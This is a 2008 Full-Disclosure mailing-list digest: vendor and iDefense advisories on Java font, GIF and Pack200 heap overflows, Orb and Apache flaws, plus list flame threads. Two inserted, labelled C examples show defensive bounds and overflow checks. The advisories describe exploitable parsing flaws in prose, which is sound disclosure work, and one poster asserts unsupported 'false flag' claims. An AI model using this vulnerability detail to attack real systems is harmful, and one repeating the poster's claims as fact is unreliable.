http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.7_sparc.deb Size/MD5 checksum: 3649792 e490362b2bc7f2061de496b036bacf6e http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-sparc_2.6.24-6~etchnhalf.7_sparc.deb Size/MD5 checksum: 81106 bed849cd37f07f1827b83968205006b9 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sparc64-smp_2.6.24-6~etchnhalf.7_sparc.deb Size/MD5 checksum: 259620 376c346454b210fd5a41df9333469054 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sparc64_2.6.24-6~etchnhalf.7_sparc.deb Size/MD5 checksum: 257548 e19691a226d0a32cc1c50fd8a8460483 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sparc64_2.6.24-6~etchnhalf.7_sparc.deb Size/MD5 checksum: 12978174 2639d1d96059ade27eee89b3be7d5373 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sparc64-smp_2.6.24-6~etchnhalf.7_sparc.deb Size/MD5 checksum: 13266842 1809a7df4eeedca63c0100113273119f These changes will probably be included in the stable distribution on its next update. 
- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFJOBmShuANDBmkLRkRApZPAJ48yj73eeALcRxpRbKIZ1SG7ZyAFACcCpgR
EYNHoAbXK1hm3n+TeEjBekc=
=kYxw
-----END PGP SIGNATURE-----

From DDI.VulnerabilityAlert at ddifrontline.com Thu Dec 4 15:03:00 2008
From: DDI.VulnerabilityAlert at ddifrontline.com (DDI_Vulnerability_Alert)
Date: Thu, 4 Dec 2008 09:03:00 -0600
Subject: [Full-disclosure] DDIVRT-2008-18 Orb Denial of Service
Message-ID: <2571D31D42513640AE1632FEE100E0E402DD744F@hypercom.defense.local>

Title
-----
DDIVRT-2008-18 Orb Denial of Service

Severity
--------
Medium

Date Discovered
---------------
October 21st 2008

Discovered By
-------------
Digital Defense, Inc. Vulnerability Research Team
Credit: Steven James and r at b13$

Vulnerability Description
-------------------------
Orb Networks' Orb media server is vulnerable to a denial of service condition. Sending malformed http requests may crash the service denying service to legitimate users.

Solution Description
--------------------
Use firewall rules to restrict access to authorized users of the Orb server. This issue has been fixed in version 2.01.0025, which is available on Orb's website.

Tested Systems / Software (with versions)
------------------------------------------
Orb version 2.01.0017 on Windows XP Pro SP2
Nullsoft Winamp Remote Server Beta (featuring Orb version 2.01.0013) on Windows XP Pro SP2
Orb version 2.01.0020 on Windows XP Pro SP2

Vendor Contact
--------------
Orb Networks
http://www.orb.com
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081204/c63ec93e/attachment.html

From nytrokiss at gmail.com Thu Dec 4 20:39:35 2008
From: nytrokiss at gmail.com (James Matthews)
Date: Thu, 4 Dec 2008 22:39:35 +0200
Subject: [Full-disclosure] News for Ureleet
In-Reply-To: <6f4bb0b50812031923y562135byd77eddd898caae6@mail.gmail.com>
References: <4b6ee9310812030043k746d8dc2pda041c096b41196d@mail.gmail.com> <6158bb410812030652r7a8a5c8as3cc62f4ac3979df@mail.gmail.com> <4b6ee9310812031346m3129a698x561fda046588fe52@mail.gmail.com> <6f4bb0b50812031923y562135byd77eddd898caae6@mail.gmail.com>
Message-ID: <8a6b8e350812041239g2e29f1b3wb632dab73ed30569@mail.gmail.com>

A nice compromise I wonder if it will work......

On Thu, Dec 4, 2008 at 5:23 AM, ghost wrote:
> Hey mike, how about you stop playing moderator you fucking douche bag.
> I for one believe netdev brings a lot to this list and encourage him
> and ureleet to continue posting.
>
> On Wed, Dec 3, 2008 at 9:47 PM, Mike C wrote:
> > Hye Guys,
> >
> > I thought we had settled the issues offline. Let's restart our
> > discussions.. this bickering is highly unnecessary on the list.
> >
> > --
> > MC
> > Security Researcher
> > Lead, Project Chroma
> > http://sites.google.com/site/projectchromaproject/
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

--
http://www.astorandblack.com/
http://www.jewelerslounge.com/
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081204/742cf56f/attachment.html

From labs-no-reply at idefense.com Thu Dec 4 19:41:13 2008
From: labs-no-reply at idefense.com (iDefense Labs)
Date: Thu, 04 Dec 2008 14:41:13 -0500
Subject: [Full-disclosure] iDefense Security Advisory 12.04.08: Sun Java JRE TrueType Font Parsing Heap Overflow Vulnerability
Message-ID: <49383259.8080202@idefense.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

iDefense Security Advisory 12.02.08
http://labs.idefense.com/intelligence/vulnerabilities/
Dec 02, 2008

I. BACKGROUND

The Sun Java JRE is Sun's implementation of the Java runtime. For more information, see the vendor's site found at the following link.

http://www.java.com

II. DESCRIPTION

Remote exploitation of a heap overflow vulnerability in Sun Microsystems Inc.'s Java JRE could allow an attacker to execute arbitrary code with the privileges of the current user.

The vulnerability exists within the font parsing code in the JRE. Various types of fonts are supported, one of which is the TrueType format font. The vulnerability occurs when processing TrueType font files. During parsing, improper bounds checking is performed, which can lead to a heap based buffer overflow.

III. ANALYSIS

Exploitation allows attackers to execute arbitrary code in the context of the currently logged-on user. To exploit this vulnerability, a targeted user must load a malicious Web page created by an attacker. An attacker typically accomplishes this via social engineering or injecting content into compromised, trusted sites.

The content of the overflow buffer undergoes a series of transformations during the font decoding process. The data is not entirely controlled by the attacker, but there is likely enough control to allow for the overwriting of critical data structures in a manner that makes exploitation possible.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in Sun Microsystems Inc.'s Java JRE version 1.6.0_07 for Windows. Previous versions and versions for other platforms may also be affected.

V. WORKAROUND

iDefense is currently unaware of any workarounds for this vulnerability.

VI. VENDOR RESPONSE

Sun Microsystems Inc. has released a patch which addresses this issue. For more information, consult their advisories at the following URL.

http://onesearch.sun.com/onesearch/index.jsp?qt=Bug%206751322&charset=UTF-8

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not been assigned yet.

VIII. DISCLOSURE TIMELINE

09/10/2008 Initial Vendor Notification
10/28/2008 Initial Vendor Reply
11/25/2008 Additional Vendor Feedback
12/02/2008 Coordinated Public Disclosure

IX. CREDIT

This vulnerability was discovered by Sean Larsson, iDefense Labs.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFJODJZbjs6HoxIfBkRAk1nAKDt6PFkGPu1QmIuloDG9N9V4yc3FQCglUAH
P+jmeMp9co0KtkQe1M57hwk=
=1EjC
-----END PGP SIGNATURE-----

From labs-no-reply at idefense.com Thu Dec 4 21:39:20 2008
From: labs-no-reply at idefense.com (iDefense Labs)
Date: Thu, 04 Dec 2008 16:39:20 -0500
Subject: [Full-disclosure] iDefense Security Advisory 12.04.08: Sun Java Web Start GIF Decoding Memory Corruption Vulnerability
Message-ID: <49384E08.4050808@idefense.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

iDefense Security Advisory 12.02.08
http://labs.idefense.com/intelligence/vulnerabilities/
Dec 02, 2008

I. BACKGROUND

Java Web Start (JWS) is a framework built by Sun that is used to run Java applications outside of the browser. It is distributed with the Java Runtime Environment (JRE) installation. JWS is typically launched by clicking on a link in the browser, and results in a separate process being started that is not tied to the JVM inside of the browser. A file contains various parameters that describe the Java application to be run. For more information, see the vendor's site found at the following link.

http://java.sun.com/javase/technologies/desktop/javawebstart/index.jsp

II. DESCRIPTION

Remote exploitation of a memory corruption vulnerability in Sun Microsystems Inc.'s Java Web Start could allow an attacker to execute arbitrary code with the privileges of the current user.

When JWS starts up, it displays a splash screen. By default, the image displayed on this splash screen is a GIF file provided by Sun, but it is possible for an attacker to pass an arbitrary GIF file to the splash logo parsing code.

The vulnerability occurs when parsing this GIF file. The parsing code does not correctly validate several values in the GIF header. This lets an attacker write data outside of the bounds of an allocated heap buffer, which can lead to the execution of arbitrary code.

III. ANALYSIS

Exploitation of this vulnerability results in the execution of arbitrary code with the privileges of the user. There are several ways to exploit this vulnerability. In Internet Explorer 6, after the user visits the malicious web page, no further user interaction is needed. However, in FireFox and Internet Explorer 7, the user will be presented with the 'File Open' confirmation dialog, and will have to accept opening the file.

It would also be possible for an attacker to e-mail an infected file to a user, or place it on a shared network drive. In this situation, a targeted user would need to manually open the file.

Even though the vulnerability is likely to be triggered through the browser, the actual vulnerability occurs in the Web Start binary. Since this vulnerability allows for relatively precise control of the area and content of memory corrupted, reliable exploitation is possible.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in Java Web Start version 1.6_10 and 1.6_07 on Windows and Linux. Previous versions may also be affected.

V. WORKAROUND

On Windows, it is possible to prevent automatic exploitation by double clicking such a file, or opening it through the browser by removing the file associations for JNLP files. However, if a user specifically selects the Java Web Start application to open the JNLP file, exploitation is still possible. This can be done by removing the registry key for .jnlp in the 'HKEY_CLASSES_ROOT' registry hive.

An additional workaround which will prevent all exploitation attempts is to rename the splashscreen library so that Java Web Start will not be able to load it. This file is found in different locations depending on the platform and installation choices, but one such location is:

C:\Program Files\Java\jre6\bin\splashscreen.dll

Renaming this file to splashscreen.dll.bak will prevent it from being loaded.

VI. VENDOR RESPONSE

Sun Microsystems Inc. has released a patch which addresses this issue. For more information, consult their advisory at the following URL.

http://sunsolve.sun.com/search/document.do?assetkey=1-66-244987-1

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not been assigned yet.

VIII. DISCLOSURE TIMELINE

10/01/2008 Initial Vendor Notification
11/05/2008 Initial Vendor Reply
11/25/2008 Additional Vendor Feedback
12/02/2008 Coordinated Public Disclosure

IX. CREDIT

This vulnerability was reported to iDefense by regenrecht.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
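The kind of header validation the Java Web Start GIF advisory above says was missing, as an added example that is not part of the advisory and is not Sun's or iDefense's code. The advisory does not say which header values went unchecked, so the fields validated here (logical screen size, frame offset and size), the 4096-pixel cap and all function names are assumptions for illustration; the sample inputs are constructed.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MAX_DIM 4096u   /* assumed policy cap for a splash image */

enum { GIF_OK = 0, GIF_TRUNCATED = -1, GIF_BAD_MAGIC = -2, GIF_BAD_SCREEN = -3,
       GIF_BAD_BLOCK = -4, GIF_NO_IMAGE = -5, GIF_FRAME_OOB = -6 };

typedef struct {
    uint16_t screen_w, screen_h;  /* logical screen descriptor */
    uint16_t left, top, w, h;     /* first image descriptor */
} gif_geom;

/* Bounded cursor: no byte is read without checking what remains. */
typedef struct { const uint8_t *p; size_t left; } cursor;

static int take(cursor *c, size_t n, const uint8_t **out) {
    if (c->left < n) return 0;
    *out = c->p;
    c->p += n;
    c->left -= n;
    return 1;
}

static uint16_t rd16le(const uint8_t *p) {
    return (uint16_t)(p[0] | (p[1] << 8));
}

/* Parse up to the first image descriptor and validate the geometry a decoder
 * would later use to size and index its canvas buffer. */
int gif_parse_geometry(const uint8_t *buf, size_t len, gif_geom *g) {
    cursor c = { buf, len };
    const uint8_t *b;

    if (!take(&c, 6, &b)) return GIF_TRUNCATED;
    if (memcmp(b, "GIF87a", 6) != 0 && memcmp(b, "GIF89a", 6) != 0)
        return GIF_BAD_MAGIC;

    if (!take(&c, 7, &b)) return GIF_TRUNCATED;
    g->screen_w = rd16le(b);
    g->screen_h = rd16le(b + 2);
    if (g->screen_w == 0 || g->screen_h == 0 ||
        g->screen_w > MAX_DIM || g->screen_h > MAX_DIM)
        return GIF_BAD_SCREEN;
    if (b[4] & 0x80) {                        /* global colour table follows */
        size_t gct = (size_t)3 << ((b[4] & 7) + 1);
        if (!take(&c, gct, &b)) return GIF_TRUNCATED;
    }

    for (;;) {
        if (!take(&c, 1, &b)) return GIF_TRUNCATED;
        if (*b == 0x3B) return GIF_NO_IMAGE;  /* trailer before any image */
        if (*b == 0x21) {                     /* extension: label, sub-blocks */
            if (!take(&c, 1, &b)) return GIF_TRUNCATED;
            for (;;) {
                size_t n;
                if (!take(&c, 1, &b)) return GIF_TRUNCATED;
                n = *b;
                if (n == 0) break;            /* block terminator */
                if (!take(&c, n, &b)) return GIF_TRUNCATED;
            }
            continue;
        }
        if (*b != 0x2C) return GIF_BAD_BLOCK;
        if (!take(&c, 9, &b)) return GIF_TRUNCATED;
        g->left = rd16le(b);     g->top = rd16le(b + 2);
        g->w    = rd16le(b + 4); g->h   = rd16le(b + 6);
        /* Sum in 32 bits so left + w cannot wrap a 16-bit value. */
        if (g->w == 0 || g->h == 0 ||
            (uint32_t)g->left + g->w > g->screen_w ||
            (uint32_t)g->top + g->h > g->screen_h)
            return GIF_FRAME_OOB;
        return GIF_OK;
    }
}

int gif_check(const uint8_t *buf, size_t len) {
    gif_geom g;
    return gif_parse_geometry(buf, len, &g);
}

/* Constructed sample: 10x10 screen, one extension block, 8x8 frame at (2,2). */
static const uint8_t SAMPLE_OK[] = {
    'G','I','F','8','9','a', 0x0A,0x00, 0x0A,0x00, 0x00, 0x00, 0x00,
    0x21,0xF9,0x04, 0x00,0x00,0x00,0x00, 0x00,
    0x2C, 0x02,0x00, 0x02,0x00, 0x08,0x00, 0x08,0x00, 0x00 };

/* Constructed sample: same screen, frame 9 wide at x=2 overruns the canvas. */
static const uint8_t SAMPLE_OOB[] = {
    'G','I','F','8','9','a', 0x0A,0x00, 0x0A,0x00, 0x00, 0x00, 0x00,
    0x2C, 0x02,0x00, 0x02,0x00, 0x09,0x00, 0x08,0x00, 0x00 };

int main(void) {
    printf("valid sample:     %d\n", gif_check(SAMPLE_OK, sizeof SAMPLE_OK));
    printf("frame off canvas: %d\n", gif_check(SAMPLE_OOB, sizeof SAMPLE_OOB));
    printf("truncated input:  %d\n", gif_check(SAMPLE_OK, 25));
    return 0;
}
```

A decoder that rejects anything other than GIF_OK never sizes or indexes its canvas from unvalidated header fields.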
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFJOE4Ibjs6HoxIfBkRAq7lAKDWvrsT2+KJSfwTUA4hVm0PZBhG2wCg28SF
2g/yCJEYuFi+VeZOd0h9LFI=
=F+J5
-----END PGP SIGNATURE-----

From labs-no-reply at idefense.com Thu Dec 4 22:00:47 2008
From: labs-no-reply at idefense.com (iDefense Labs)
Date: Thu, 04 Dec 2008 17:00:47 -0500
Subject: [Full-disclosure] iDefense Security Advisory 12.04.08: Sun Java JRE Pack200 Decompression Integer Overflow Vulnerability
Message-ID: <4938530F.7030906@idefense.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

iDefense Security Advisory 12.02.08
http://labs.idefense.com/intelligence/vulnerabilities/
Dec 02, 2008

I. BACKGROUND

Pack200 is a compression method introduced by Sun in the 1.5 release of the JRE. It is used to compress Jar files, and is optimized for the compression of Java class files. A Java applet can be compressed using the pack200 tool, and if the browser plugin supports the pack200-gzip encoding it will pass the compressed Jar file to the JRE for unpacking. For more information, see the vendor's site at the following links.

http://www.sun.com/java/
http://java.sun.com/j2se/1.5.0/docs/guide/deployment/deployment-guide/pack200.html

II. DESCRIPTION

Remote exploitation of an integer overflow vulnerability in Sun Microsystems Inc.'s Java JRE could allow an attacker to execute arbitrary code with the privileges of the current user.

The vulnerability occurs when reading the Pack200 compressed Jar file during decompression. In order to calculate the size of a heap buffer, the code multiplies and adds several integers. The bounds of these values are not checked, and the arithmetic operations can overflow. This results in an undersized buffer being allocated, which leads to a heap based buffer overflow.

III. ANALYSIS

Exploitation allows attackers to execute arbitrary code in the context of the currently logged-on user. To exploit this vulnerability, a targeted user must load a malicious Web page created by an attacker. An attacker typically accomplishes this via social engineering or injecting content into compromised, trusted sites.

Exploitation of heap overflow vulnerabilities on modern operating systems can at times be difficult due to various heap integrity protections. However, the Pack200 code uses a custom allocator that does not contain such integrity checks. Labs testing has demonstrated that code execution is possible on the Linux platform. A similar methodology is likely to be successful on the Windows platform.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in Sun Microsystems Inc.'s Java JRE version 1.6.0_07 for Windows and Linux. According to Sun, Pack200 was first introduced in JRE 1.5.0. The latest version of JRE 1.5, 1.5.0_15, does contain the vulnerable code, but the browser plugin does not handle Pack200 encoding. As such, exploitation through the browser does not appear to be possible with JRE 1.5.

V. WORKAROUND

The library containing the vulnerability can be renamed, which will prevent it from being loaded. This workaround will prevent users from loading Pack200 format Jar files, and from using the pack/unpack tools that come with the JRE. However, normal applets and Java applications will continue to function correctly.

The vulnerable library is called 'unpack', and can be found in:

"%SYSTEMDRIVE%\Program Files\Java\JAVA VERSION\bin\unpack.dll"

on Windows, and in differing locations dependent upon the distribution/platform on Unix systems.

VI. VENDOR RESPONSE

Sun Microsystems Inc. has released a patch which addresses this issue. For more information, consult their advisory at the following URL.

http://sunsolve.sun.com/search/document.do?assetkey=1-66-244992-1

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not been assigned yet.

VIII. DISCLOSURE TIMELINE

10/02/2008 Initial Vendor Notification
11/25/2008 Initial Vendor Reply
12/02/2008 Coordinated Public Disclosure

IX. CREDIT

This vulnerability was reported to iDefense by regenrecht.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
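The failure mode described in section II of the Pack200 advisory above, as an added example that is not part of the advisory and is not code from the JRE or from iDefense: a buffer size built by multiplying and adding 32-bit counts, first unchecked and then with every step checked. The structure, the field names, the size expression and the 64 MiB cap are assumptions, since the advisory does not give the real expression; the header values are constructed.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define MAX_BAND_BYTES ((size_t)64 * 1024 * 1024)  /* assumed policy cap */

/* Hypothetical counts read from an untrusted archive header. */
typedef struct {
    uint32_t count;       /* number of entries */
    uint32_t entry_size;  /* bytes per entry */
    uint32_t header_len;  /* fixed bytes in front of the entries */
} band_hdr;

/* Unchecked form: the 32-bit multiply and add wrap modulo 2^32, so the
 * result can be far smaller than what the copy loop will write. */
uint32_t band_size_unchecked(const band_hdr *h) {
    return h->count * h->entry_size + h->header_len;
}

/* What the copy loop really needs, computed in 64 bits (cannot wrap:
 * (2^32-1)^2 + (2^32-1) is below 2^64). */
uint64_t band_size_needed(const band_hdr *h) {
    return (uint64_t)h->count * h->entry_size + h->header_len;
}

/* Portable checked arithmetic on size_t: test before operating. */
static int mul_ok(size_t a, size_t b, size_t *r) {
    if (a != 0 && b > SIZE_MAX / a) return 0;
    *r = a * b;
    return 1;
}

static int add_ok(size_t a, size_t b, size_t *r) {
    if (b > SIZE_MAX - a) return 0;
    *r = a + b;
    return 1;
}

/* Checked form: returns the byte count to allocate, or 0 to reject the
 * input. Overflow and an implausibly large result are both rejections. */
size_t band_size_checked(const band_hdr *h) {
    size_t n;
    if (!mul_ok(h->count, h->entry_size, &n)) return 0;
    if (!add_ok(n, h->header_len, &n)) return 0;
    if (n > MAX_BAND_BYTES) return 0;
    return n;
}

/* Constructed headers: one ordinary, one whose product exceeds 32 bits. */
static const band_hdr BENIGN  = { 100u, 16u, 32u };
static const band_hdr HOSTILE = { 0x10000001u, 16u, 32u };

int main(void) {
    printf("benign : unchecked=%u needed=%llu checked=%lu\n",
           (unsigned)band_size_unchecked(&BENIGN),
           (unsigned long long)band_size_needed(&BENIGN),
           (unsigned long)band_size_checked(&BENIGN));
    printf("hostile: unchecked=%u needed=%llu checked=%lu\n",
           (unsigned)band_size_unchecked(&HOSTILE),
           (unsigned long long)band_size_needed(&HOSTILE),
           (unsigned long)band_size_checked(&HOSTILE));
    return 0;
}
```

For the second header the unchecked size is 48 bytes while the entries need over 4 GiB, which is the undersized allocation the advisory describes; the checked form rejects it before any allocation happens.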
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFJOFMPbjs6HoxIfBkRAt4LAKDhmj/ozNKfY4ivEyfBzlaEWUIWMwCfWhzp
QSiD+sqZ2PGexeNSYO3XVrI=
=oup8
-----END PGP SIGNATURE-----

From security at mandriva.com Thu Dec 4 22:15:00 2008
From: security at mandriva.com (security at mandriva.com)
Date: Thu, 04 Dec 2008 15:15:00 -0700
Subject: [Full-disclosure] [ MDVSA-2008:237 ] apache2
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory MDVSA-2008:237
http://www.mandriva.com/security/
_______________________________________________________________________

Package : apache2
Date    : December 4, 2008
Affected: Corporate 3.0, Multi Network Firewall 2.0
_______________________________________________________________________

Problem Description:

A vulnerability was discovered in the mod_proxy module in Apache where it did not limit the number of forwarded interim responses, allowing remote HTTP servers to cause a denial of service (memory consumption) via a large number of interim responses (CVE-2008-2364).

This update also provides HTTP/1.1 compliance fixes.

The updated packages have been patched to prevent this issue.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2364
_______________________________________________________________________

Updated Packages:
_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security.
You can obtain the GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFJOCuNmqjQ0CJFipgRAt+pAKDO9fruRTCR1580NTYdYmnky057aACdFVGo
NmJlapeQ2vPQcDIjsktx95s=
=5zLR
-----END PGP SIGNATURE-----

From xploitable at gmail.com Thu Dec 4 22:29:21 2008
From: xploitable at gmail.com (n3td3v)
Date: Thu, 4 Dec 2008 22:29:21 +0000
Subject: [Full-disclosure] Project Chroma: A color code for the state of cyber security
In-Reply-To: <2d792fb20812040836r7746afdahf5ab892579069878@mail.gmail.com>
References: <20081202192922.62A6C118041@smtp.hushmail.com> <49375527.3070804@clusterbee.net> <2d792fb20812040836r7746afdahf5ab892579069878@mail.gmail.com>
Message-ID: <4b6ee9310812041429y40f606bcq837c44e829a11948@mail.gmail.com>

On Thu, Dec 4, 2008 at 4:36 PM, Razi Shaban wrote:
> On Thu, Dec 4, 2008 at 5:03 PM, Chris Jeane wrote:
>> The Project Chroma Project website reads (I have highlighted the colors in
>> black so that they are readable):
>>
>> Levels crap
>>
>
> On Thu, Dec 4, 2008 at 6:28 PM, Razi Shaban wrote:
>> On Thu, Dec 4, 2008 at 6:02 PM, Chris Jeane wrote:
>>> Exactly. Which is why there is a need of a system that contains more
>>> information and less cookie cutter levels. We still don't know what a
>>> cyber-war looks like. One country could attack the transport/power systems
>>> of a third party that supplies/supports their target. This is all
>>> hypothetical, but there is a high probability of collateral damage.
>>>
>>
>> You misunderstood me. What I was getting at is that your ideas,
>> including a "cyber-war" and all this leveling, show that you are about
>> as uninformed as n3td3v. Please take your nub spam somewhere else.
>>
>> --
>> Razi Shaban
>>
>
> To explain the idea of leveling: The internet is a gigantic place. No
> matter when and from where you connect, it is out to get you, you
> individually. Also, large-scale cyber wars are a constant thing. I am
> aware of three very large-scale wars taking place at the moment, does
> that increase or decrease the risk any user would be taking by
> accessing the internet? Of course not. The concept of basing a
> levelling system on a few organized national or private attempts to do
> something or another is ridiculous; the Estonian attack compromised
> less than 0.0001% of all cyber attacks during that time period.
>
> The matter of the fact is, attempting to take the hugely complex and
> intricate dark side of the internet and summarize it in a color level
> is absurd. In fact, attempting to summarize it at all is ridiculous.
> Summarizing implies that you know everything about the topic. Anyone
> trying to summarize this knows nothing when he/she realizes the
> vastness of the internet.
>
> tl;dr : attempting to summarize the internet is less fruitful than
> throwing ice cubes at the sun, but it requires much lesser
> intelligence to do the first.
>

I can't believe people are still using Estonia as an example of a cyber attack, it was a false flag on an epic scale and so obvious to I.T security experts. The government have got to try harder if they want to convince the industry that cyber terrorism is a real threat. But the fact is Estonia and Georgia just weren't convincing enough at least for me, I don't know what others think.

And the shutting down of a turbine and posting the video to CNN was just a joke, there was no actual evidence of how the turbine shut down, it could just be a man in the corner flicking a switch, there was no evidence of someone using a computer to shut it down, we were told it was a cyber attack doing it, but no proof or evidence was given to prove it. They didn't even have a guy with a laptop standing beside it or anything like that, really the government are clueless when it comes to cyber security and creating a convincing false flag.

When it comes to power stations being shut down through computerised attack, I don't see the threat coming from cyber terrorism, what I see the threat is more is accidental infection, like the three hospitals in London that got shut down last month because of the MyTob worm/virus, the industry sit up and listen to that kind of thing and take it seriously (or at least I did), but they shouldn't take seriously Estonia, Georgia, DHS turbine videos.

Cyber terrorism isn't a real threat in the climate we're in right now, what we should fear is accidental infection like the three hospitals in London. That got my attention more than Estonia, Georgia, DHS turbine video put together, because it was so obvious that the three hospitals in London was a genuine incident and not set up by the powers that be.

We should worry more about staff competence being the main threat, not cyber terrorism, but mistakes made by I.T departments and accidental infection onto networks that are sensitive like the three hospitals in London.

Please it just makes me cringe when I see people using Estonia as a way to pave political policy and setting up things. There is no cyber terrorism guys, there is staff incompetence and accidental infection that is the biggest worry for me right now, than some people in a cave wanting to carry out an electronic jihad.
Money is wasted setting up cyber commands and other stuff, the money should really be spent on making sure the private and public sector and academia is trained to a specific standard so that the three hospitals incident can't happen again.

As for the color code thing, that's just a load of wash and bollocks that's not needed, it's good for businesses like Symantec and SANS to have alert levels, because fear is part of what they play on to make the money that they do.

All the best,

n3td3v

From labs-no-reply at idefense.com Thu Dec 4 22:35:06 2008
From: labs-no-reply at idefense.com (iDefense Labs)
Date: Thu, 04 Dec 2008 17:35:06 -0500
Subject: [Full-disclosure] iDefense Security Advisory 12.04.08: Sun Java JRE TrueType Font Parsing Integer Overflow Vulnerability
Message-ID: <49385B1A.4020506@idefense.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

iDefense Security Advisory 12.02.08
http://labs.idefense.com/intelligence/vulnerabilities/
Dec 02, 2008

I. BACKGROUND

The Sun Java JRE is Sun's implementation of the Java runtime. For more information, see the vendor's site found at the following link.

II. DESCRIPTION

Remote exploitation of an integer overflow vulnerability in Sun Microsystems Inc.'s Java JRE could allow an attacker to execute arbitrary code with the privileges of the current user.

The vulnerability exists within the font parsing code in the JRE. As part of its font API, the JRE provides the ability to load a font from a remote URL. Various types of fonts are supported, one of which is the TrueType format font. The vulnerability occurs when parsing various structures in TrueType font files. During parsing, values are taken from the file, and without being properly validated, used in operations that calculate the number of bytes to allocate for heap buffers. The calculations can overflow, resulting in a potentially exploitable heap overflow.

III. ANALYSIS

Exploitation allows attackers to execute arbitrary code in the context of the currently logged on user. To exploit this vulnerability, a targeted user must load a malicious web page created by an attacker. An attacker typically accomplishes this via social engineering or injecting content into compromised, trusted sites.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in Sun Microsystems Inc.'s Java JRE version 1.6.0_05 for Windows. Previous versions may also be affected.

V. WORKAROUND

